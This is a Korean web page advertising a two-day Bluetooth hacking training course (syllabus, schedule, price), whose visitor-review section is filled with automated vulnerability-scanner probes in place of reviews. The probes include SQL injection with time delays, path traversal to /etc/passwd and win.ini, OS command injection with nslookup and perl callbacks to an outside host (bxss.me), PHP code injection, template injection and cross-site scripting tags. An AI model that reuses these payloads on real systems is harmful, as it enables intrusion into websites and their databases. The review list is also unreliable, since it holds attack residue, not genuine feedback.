Wireless - Bluetooth Hacking
 
강의 요약

    키보드, 마우스를 비롯하여 스피커, 스마트워치, 결제시스템, 스마트카 등 블루투스 기반 무선 통신의 활용 범위는 날로 증가하고 있습니다.
    하지만 공격자의 관점에서 보았을 때, 블루투스는 대상 시스템에 침투할 수 있는 하나의 좋은 공격 벡터로서 악용될 수 있습니다.    
    본 트레이닝에서는 블루투스의 특징과 작동 구조에 대해 이해하고, 다양한 해킹 방법들에 대한 이론과 실습들을 다루게 됩니다.
기본 정보

    • 강의명 : Wireless - Bluetooth Hacking
    • 강사 : 정구홍
    • 강의 일정 : 2018년 5월 3일(금) ~ 5월 4일(금)
    • 강의 시간 : 매일 오전 10시~오후 6시
    • 강의 장소 : 분당구 정자동 Grayhash 트레이닝룸 [위치보기]
    • 수강 정원 : 10명 (최소 인원 5명)
    • 강의 비용 : 1,500,000원 (VAT 별도)
    • 중식 및 다과 제공

주요 교육 내용

    • 블루투스 무선 통신 기초
    • 블루투스 관련 프로그래밍 방법의 이해
    • 블루투스 해킹 기술 공격 실습
상세 교육 내용


    1일차 - Bluetooth Essential
    
    • Bluetooth 기초 (Master/Slave, Piconet)
    • Bluetooth module 사용 실습
    • Bluetooth Packet 송수신 실습
    • Bluetooth Packet Sniffing 실습
    • Bluetooth Packet 분석
    • Bluetooth Profile의 이해
    • Bluetooth Profile Scanning 실습
    • Bluetooth Programming 과정의 이해 (C, Python)
    • Bluetooth의 버전별 특징의 이해
    • Bluetooth Classic vs BLE(Bluetooth Low Energy)


    2일차 - Bluetooth Hacking

    • Bluetooth Security Mode의 이해
    • Bluetooth 인증 과정의 이해 (Paring, Link Key)
    • Bluetooth Packet 변조 실습
    • Bluetooth Packet Fuzzing 실습
    • Bluetooth Tools 사용 실습 (hcitool, hcidump, btscanner, sdptool, spooftooph)
    • Bluetooth Application Level에서의 취약점 공격 실습
    • Bluetooth Stack의 이해(Radio, LC, LMP, HCI, L2CAP, RFCOMM, SDP, OBEX)
    • 공개 취약점 분석 및 활용 실습 : BlueBorne Exploit
    • 상용 Bluetooth Packet Sniffer 활용 실습 : Ubertooth

    * 상기 1~2일차 교육 내용은 상황에 따라 일부 변동될 수 있습니다.

교재 및 실습 장비 목록

    [교재]
    • 강의 PPT

    [기타]
    • 수료증(certificate) 발급

교육자 준비사항

    • 노트북
    • Software : PowerPoint 혹은 Acrobat Reader, Vmware


트레이닝 수강 후기
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqZVgrF3Lu
    * JCfUZQsq-1 OR 2+255-255-1=0+0+0+1 --
    * JCfUZQsq-1 OR 2+478-478-1=0+0+0+1
    * JCfUZQsq-1' OR 2+237-237-1=0+0+0+1 --
    * JCfUZQsq-1' OR 2+305-305-1=0+0+0+1 or 'JRHV0H2Y'='
    * JCfUZQsq-1" OR 2+678-678-1=0+0+0+1 --
    * JCfUZQsqif(now()=sysdate(),sleep(15),0)
    * JCfUZQsq0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
    * JCfUZQsq0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
    * JCfUZQsq(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    * JCfUZQsq-1; waitfor delay '0:0:15' --
    * JCfUZQsq-1); waitfor delay '0:0:15' --
    * JCfUZQsq1 waitfor delay '0:0:15' --
    * JCfUZQsqOLFk2f3S'; waitfor delay '0:0:15' --
    * JCfUZQsq-5 OR 796=(SELECT 796 FROM PG_SLEEP(15))--
    * JCfUZQsq-5) OR 652=(SELECT 652 FROM PG_SLEEP(15))--
    * JCfUZQsq-1)) OR 603=(SELECT 603 FROM PG_SLEEP(15))--
    * JCfUZQsqWSQ1J8On' OR 633=(SELECT 633 FROM PG_SLEEP(15))--
    * JCfUZQsqiGJ78eZc') OR 484=(SELECT 484 FROM PG_SLEEP(15))--
    * JCfUZQsqiIWrBpfJ')) OR 776=(SELECT 776 FROM PG_SLEEP(15))--
    * JCfUZQsq555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    * JCfUZQsq555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    * JCfUZQsq1'"
    * JCfUZQsq1%2527%2522
    * JCfUZQsq@@poW97
    * JCfUZQsq555
    * JCfUZQsq555
    * R0i30TBs555
    * -1 OR 2+55-55-1=0+0+0+1 --555
    * -1 OR 2+230-230-1=0+0+0+1555
    * -1' OR 2+357-357-1=0+0+0+1 --555
    * -1' OR 2+701-701-1=0+0+0+1 or 'YdOosTVr'='555
    * -1" OR 2+408-408-1=0+0+0+1 --555
    * if(now()=sysdate(),sleep(15),0)555
    * 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z555
    * 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z555
    * (select(0)from(select(sleep(15)))v)/*'+(select(0)f555
    * 1 waitfor delay '0:0:15' --555
    * Yif8hNB2'; waitfor delay '0:0:15' --555
    * oPnmNqqh' OR 78=(SELECT 78 FROM PG_SLEEP(15))--555
    * 7T2QBXVC') OR 418=(SELECT 418 FROM PG_SLEEP(15))--555
    * PrptOgEx')) OR 868=(SELECT 868 FROM PG_SLEEP(15))-555
    * JCfUZQsq'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(555
    * 1'"555
    * 1%2527%2522555
    * @@kcG4o555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqA3ORvuON
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * dXCCsaUr555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqresponse.write(9762941*9402988)
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq'+response.write(9762941*9402988)+'
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq"+response.write(9762941*9402988)+"
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * response.write(9112579*9543762)555
    * JCfUZQsq<esi:include src="http://bxss.me/rpb.pn555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * '+response.write(9112579*9543762)+'555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq${9999840+10000040}
    * JCfUZQsq555
    * "+response.write(9112579*9543762)+"555
    * JCfUZQsq555
    * JCfUZQsq
    * JCfUZQsq../../../../../../../../../../../../../../etc/passwd
    * ${10000351+9999772}555
    * JCfUZQsq555
    * NHJsSWxmWHk=555
    * JCfUZQsq555
    * JCfUZQsq12345'"\'\");|]*{
<>''💡
    * JCfUZQsq../../../../../../../../../../../../../../windows/win.ini
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq../555
    * JCfUZQsq555&n942667=v988242
    * JCfUZQsq555
    * JCfUZQsq555
    * 12345'"\'\");|]*{ <>''💡555
    * ../../../../../../../../../../../../../../etc/pass555
    * JCfUZQsq555
    * JCfUZQsq&n909369=v957235555
    * JCfUZQsq555
    * JCfUZQsq555
    * ../../../../../../../../../../../../../../windows/555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * ../JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq)
    * JCfUZQsqecho jlofro$()\ qqeqbs\nz^xyu||a #' &echo jlofro$()\ qqeqbs\nz^xyu||a #|" &echo jlofro$()\ qqeqbs\nz^xyu||a #
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq!(()&&!|*|*|
    * JCfUZQsq&echo fpmlci$()\ txzvvi\nz^xyu||a #' &echo fpmlci$()\ txzvvi\nz^xyu||a #|" &echo fpmlci$()\ txzvvi\nz^xyu||a #
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq^(#$!@#$)(()))******
    * JCfUZQsq|echo iszlnp$()\ iijwqj\nz^xyu||a #' |echo iszlnp$()\ iijwqj\nz^xyu||a #|" |echo iszlnp$()\ iijwqj\nz^xyu||a #
    * JCfUZQsq'.gethostbyname(lc('hitoo'.'bvsmtfib01ed5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(118).chr(80).'
    * JCfUZQsq555
    * JCfUZQsq1some_inexistent_file_with_long_name.jpg
    * JCfUZQsq
    * )555
    * JCfUZQsq(nslookup hitfkcbtsycxw1ded9.bxss.me||perl -e "gethostbyname('hitfkcbtsycxw1ded9.bxss.me')")
    * JCfUZQsq".gethostbyname(lc("hitge"."ximuzmnbca8ea.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(65).chr(118).chr(89)."
    * JCfUZQsq555
    * JCfUZQsqHttp://bxss.me/t/fit.txt
    * JCfUZQsq'"()
    * !(()&&!|*|*|555
    * JCfUZQsq$(nslookup hituoutlqnpqvf35fe.bxss.me||perl -e "gethostbyname('hituoutlqnpqvf35fe.bxss.me')")
    * '.gethostbyname(lc('hitja'.'fneattep4ec10.bxss.me.555
    * JCfUZQsq555
    * ^(#$!@#$)(()))******555
    * ".gethostbyname(lc("hitlw"."ocbmqwsz9b8f2.bxss.me.555
    * JCfUZQsq&(nslookup hitwdcvtndmzuba616.bxss.me||perl -e "gethostbyname('hitwdcvtndmzuba616.bxss.me')")&'\"`0&(nslookup hitwdcvtndmzuba616.bxss.me||perl -e "gethostbyname('hitwdcvtndmzuba616.bxss.me')")&`'
    * JCfUZQsqbxss.me
    * '"()555
    * JCfUZQsq555
    * JCfUZQsq|(nslookup hitomwmrkktao54a44.bxss.me||perl -e "gethostbyname('hitomwmrkktao54a44.bxss.me')")
    * JCfUZQsq555
    * JCfUZQsq555
    * http://some-inexistent-website.acu/some_inexistent555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq`(nslookup hitosgswyvkhs597b0.bxss.me||perl -e "gethostbyname('hitosgswyvkhs597b0.bxss.me')")`
    * 1some_inexistent_file_with_long_name.jpg555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq;(nslookup hitjmqddxkaba2e405.bxss.me||perl -e "gethostbyname('hitjmqddxkaba2e405.bxss.me')")|(nslookup hitjmqddxkaba2e405.bxss.me||perl -e "gethostbyname('hitjmqddxkaba2e405.bxss.me')")&(nslookup hitjmqddxkaba2e405.bxss.me||perl -e "gethostbyname('hitjmqddxkaba2e405.bxss.me')")
    * Http://bxss.me/t/fit.txt555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * http://bxss.me/t/fit.txt?.jpg555
    * JCfUZQsq555
    * echo avchgk$()\ zxvoqn\nz^xyu||a #' &echo avchgk$(555
    * JCfUZQsq555
    * JCfUZQsq"+"A".concat(70-3).concat(22*4).concat(106).concat(86).concat(101).concat(88)+(require"socket"
Socket.gethostbyname("hitjs"+"jbnqnvbv83269.bxss.me.")[3].to_s)+"
    * bxss.me555
    * JCfUZQsq555
    * JCfUZQsqHttP://bxss.me/t/xss.html?%00
    * &echo usgmll$()\ vnonws\nz^xyu||a #' &echo usgmll$555
    * JCfUZQsq555
    * JCfUZQsq'+'A'.concat(70-3).concat(22*4).concat(99).concat(66).concat(121).concat(71)+(require'socket'
Socket.gethostbyname('hituo'+'uzhdinaa6560b.bxss.me.')[3].to_s)+'
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqbxss.me/t/xss.html?%00
    * |echo udopqs$()\ vkxlqu\nz^xyu||a #' |echo udopqs$555
    * JCfUZQsq555
    * JCfUZQsq555
    * "+"A".concat(70-3).concat(22*4).concat(108).concat555
    * JCfUZQsq;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    * HttP://bxss.me/t/xss.html?%00555
    * (nslookup hitcfnretujvhcd5b9.bxss.me||perl -e "get555
    * JCfUZQsqleave_comment.php
    * JCfUZQsq)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    * '+'A'.concat(70-3).concat(22*4).concat(112).concat555
    * bxss.me/t/xss.html?%00555
    * $(nslookup hitqnxmcvghvj84981.bxss.me||perl -e "ge555
    * JCfUZQsqleave_comment.php
    * ))))))))))))))))))))))))))))))))))))))))))))))))))555
    * JCfUZQsq555
    * JCfUZQsq';print(md5(31337));$a='
    * JCfUZQsq555
    * &(nslookup hitvdegjpghae7edb7.bxss.me||perl -e "ge555
    * JCfUZQsqleave_comment.php/.
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq";print(md5(31337));$a="
    * JCfUZQsq555
    * |(nslookup hitjszotcotysf05ee.bxss.me||perl -e "ge555
    * leave_comment.php555
    * JCfUZQsq555
    * JCfUZQsq/xfs.bxss.me
    * JCfUZQsq${@print(md5(31337))}
    * JCfUZQsq555
    * `(nslookup hitoccoegbbuq6d3ca.bxss.me||perl -e "ge555
    * leave_comment.php555
    * JCfUZQsq555
    * /xfs.bxss.me555
    * JCfUZQsq${@print(md5(31337))}\
    * JCfUZQsq555
    * ;(nslookup hityjnrfycmmk3855e.bxss.me||perl -e "ge555
    * leave_comment.php/.555
    * JCfUZQsq555
    * JCfUZQsq'.print(md5(31337)).'
    * JCfUZQsq'"
    * JCfUZQsq555
    * ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))555
    * JCfUZQsq<!--
    * JCfUZQsq555
    * ';print(md5(31337));$a='555
    * '"555
    * JCfUZQsq555'"()&%<acx><ScRiPt >M7Ok(9023)</ScRiPt>
    * ";print(md5(31337));$a="555
    * <!--555
    * JCfUZQsq'"()&%<acx><ScRiPt >M7Ok(9969)</ScRiPt>
    * ${@print(md5(31337))}555
    * JCfUZQsq5559179759
    * ${@print(md5(31337))}\555
    * JCfUZQsq'"()&%<acx><ScRiPt >M7Ok(9476)555
    * '.print(md5(31337)).'555
    * '"()&%<acx><ScRiPt >M7Ok(9493)</ScR555
    * JCfUZQsq9242362555
    * JCfUZQsq555
  * 작성자:       * 소속:       * 이메일:
   (성함, 혹은 닉네임을 입력해주세요. 입력해주신 정보들 중 작성자와 후기만 공개됩니다.)